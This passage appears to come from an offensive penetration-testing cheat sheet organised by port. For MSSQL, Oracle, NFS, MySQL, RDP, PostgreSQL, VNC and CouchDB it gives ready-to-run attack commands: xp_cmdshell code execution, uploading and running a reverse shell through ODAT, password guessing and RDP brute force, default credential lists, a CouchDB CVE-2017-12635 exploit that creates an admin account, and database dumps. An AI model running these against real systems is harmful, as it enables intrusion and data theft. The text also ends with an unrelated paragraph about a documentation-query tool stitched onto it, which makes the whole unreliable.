Leak](https://opensecurity.global/forums/topic/181-fortinet-ssl-vpn-vulnerability-from-may-2019-being-exploited-in-wild/?__cf_chl_jschl_tk__=42e37b31a0585f7dae3dbce18cafde7c39b81976-1578385705-0-AcuYzrPMO1OuMo59JSPYyzZjiXNbMAIl6sKiXwhQRbMUMZq1Kp3VmWqIVXWZdzTZgFCecXue1Z6xXxU-Rql_GT_ovKiar_-i0CUCKFS85bfNXnUzuOuIwomXje-kH87mNbVHzzh9ediRfVWbJjwtO-ttLEYi7quczLlHQk38UqcumrARs77RrK2mj9zOb8Uwhv6av4QZ9od4fgAIl-F4Kff26MPQjs4LRHsgk5zH6RVwFMP8NdOnCrrzkkGH6_R9Dtw89_QtiOsH1nKB0hBDbtJ2O9AkkMDqw7tl1ip_pVDfnw1lvaZtFq1sRqgYwpan-n6n9f58Xdjcj2UGFKdE32OS7Ete8X7RwXUV9FGUSOhAM5_iK0kMNJg3mskrFVQz0lONaZVvFRdf_1rp69J4oRVat1m7KIQEGpRDe4OvYUb7pfQkNKLcK5s_lVIj2SAJQQ) ## Port 1433 - MSSQL ```bash nmap -p 1433 -sU --script=ms-sql-info.nse 10.11.1.111 use auxiliary/scanner/mssql/mssql_ping use auxiliary/scanner/mssql/mssql_login use exploit/windows/mssql/mssql_payload sqsh -S 10.11.1.111 -U sa xp_cmdshell 'date' go EXEC sp_execute_external_script @language = N'Python', @script = N'import os;os.system("whoami")' https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/ ``` ## Port 1521 - Oracle ```bash oscanner -s 10.11.1.111 -P 1521 tnscmd10g version -h 10.11.1.111 tnscmd10g status -h 10.11.1.111 nmap -p 1521 -A 10.11.1.111 nmap -p 1521 --script=oracle-tns-version,oracle-sid-brute,oracle-brute MSF: good modules under auxiliary/admin/oracle and scanner/oracle # https://github.com/quentinhardy/odat ./odat-libc2.5-i686 all -s 10.11.1.111 -p 1521 ./odat-libc2.5-i686 sidguesser -s 10.11.1.111 -p 1521 ./odat-libc2.5-i686 passwordguesser -s 10.11.1.111 -p 1521 -d XE # Upload reverse shell with ODAT: ./odat-libc2.5-i686 utlfile -s 10.11.1.111 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ shell.exe /root/shell.exe # and run it: ./odat-libc2.5-i686 externaltable -s 10.11.1.111 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ shell.exe ``` ## Port 2000 - Cisco sccp ```bash # cisco-audit-tool CAT -h ip -p 2000 -w /usr/share/wordlists/rockyou.txt # cisco-smart-install https://github.com/Sab0tag3d/SIET/ sudo python siet.py -g -i 192.168.0.1 ``` ## Port 2049 - NFS ```bash nmap -p 111,2049 --script nfs-ls,nfs-showmount showmount -e 10.11.1.111 # If you find anything you can mount it like this: mount 10.11.1.111:/ /tmp/NFS –o nolock mount -t nfs 10.11.1.111:/ /tmp/NFS –o nolock ``` ## Port 2100 - Oracle XML DB Default passwords: ## Port 3306 - MySQL ```bash nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse 10.11.1.111 -p 3306 mysql --host=10.11.1.111 -u root -p # MYSQL UDF 4.x/5.0 https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/ ``` ## Port 3389 - RDP ```bash nmap -p 3389 --script=rdp-vuln-ms12-020.nse rdesktop -u username -p password -g 85% -r disk:share=/root/ 10.11.1.111 rdesktop -u guest -p guest 10.11.1.111 -g 94% ncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://10.11.1.111 python crowbar.py -b rdp -s 10.11.1.111/32 -u admin -C ../rockyou.txt -v ``` ## Port 5432 - PostgreSQL ```bash psql -h 10.10.1.111 -U postgres -W # Default creds postgres : postgres postgres : password postgres : admin admin : admin admin : password pg_dump --host=10.10.1.111 --username=postgres --password --dbname=template1 --table='users' -f output_pgdump ``` ## Port 5900 - VNC ```bash nmap --script=vnc-info,vnc-brute,vnc-title -p 5900 10.11.1.111 ``` ## Port 5984 - CouchDB ```bash curl http://example.com:5984/ curl -X GET http://IP:5984/_all_dbs curl -X GET http://user:password@IP:5984/_all_dbs # CVE-2017-12635 RCE # Create user curl -X PUT ‘http://localhost:5984/_users/org.couchdb.user:chenny' — data-binary ‘{ “type”: “user”, “name”: “chenny”, “roles”: [“_admin”], “roles”: [], “password”: “password” }’ # Dump database curl http://127.0.0.1:5984/passwords/_all_docs?include_docs=true -u chenny:-Xpassword ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.